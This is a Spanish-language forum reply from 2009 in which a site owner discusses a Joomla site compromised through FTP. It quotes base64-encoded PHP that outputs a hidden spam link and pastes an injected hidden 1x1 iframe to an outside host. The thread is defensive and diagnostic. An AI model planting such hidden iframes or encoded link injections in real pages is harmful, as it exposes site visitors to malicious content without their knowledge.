Ver Mensaje Individual
  #11 (permalink)  
Antiguo 18/08/2009, 07:06
Avatar de elfunebrero
elfunebrero
 
Fecha de Ingreso: julio-2005
Ubicación: Quito
Mensajes: 262
Antigüedad: 19 años, 4 meses
Puntos: 3
Respuesta: Problemas con Joomla

Cita:
Iniciado por Larenz Ver Mensaje
Vi tu web. Honestamente no me saltó para nada ningún iframe o al menos no logré visualizarlo... pero en el código fuente (creo que un menú) llama directamente a ese url externa a través de un iframe.

Sigo pensando que fue que alguien logró entrar a tu panel de control e hizo ese cambio en tu código fuente de tus archivos.

También este tipo de percances suceden a la hora de descargar módulos, componentes o plugins en sitios warez. Algunos programadores o usuarios avanzados insertan códigos ocultos o encriptados para llamar a ciertas webs. Por ejemplo la plantilla de TemplatePlazza que se llama MyStorePlazza tiene en su index.php un código en php cifrado que llama a la siguiente url www.jsharing.com (el cual seguro es un sitio warez). El código es el siguiente:

Código PHP:
<?php
    
echo base64_decode('PGRpdiBzdHlsZT0iZGlzcGxheTpub25lIj48YSBocmVmPSJodHRwOi8valNoYXJpbmcuY29tIj5Kb29tbGEgSnVzdCBmb3IgU2hhcmluZyAtIEpvb21sYSBDbHViIFRlbXBsYXRlcyBhbmQgRXh0ZW5zaW9uczwvYT48L2Rpdj4=');
?>
Su etiqueta div tiene la función display:none de forma que no se mostrará en el navegador y estará oculto.

Ese es un ejemplo o una idea de lo que una persona maliciosa puede hacernos en nuestros archivos casi sin darnos cuenta. En tu caso está de sobra leer la advertencia que muestra Google Chrome o Firefox al entrar a tu sitio, como para darse cuenta que alguien puso código malicioso.

Tienes que ser cuidadoso y verificar qué otro archivo más pudo haber sido modificado. Muchas veces te puedes auxiliar del mismo Dreamweaver... yo lo configuro para que me busque determinada palabra o código en todo el directorio raíz de Joomla.
Hola amigo creo que alguien entro a mi host por el FTP, tengo un archivo index.html que yo hice para avisar que estamos haciendo la nueva web...

Y lo extraño de todo esto es que encontre al final del codigo de ese index.html:

<iframe src="http://odiklaf.com/?click=3CDF3A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Pueden verlo aca:
http://www.galapagosfirst.com/index.html

Acabo de cambiar las claves del FTP, de los usuarios, de todo!

Saludos
__________________
Sinmiedos!
Hosting Empresas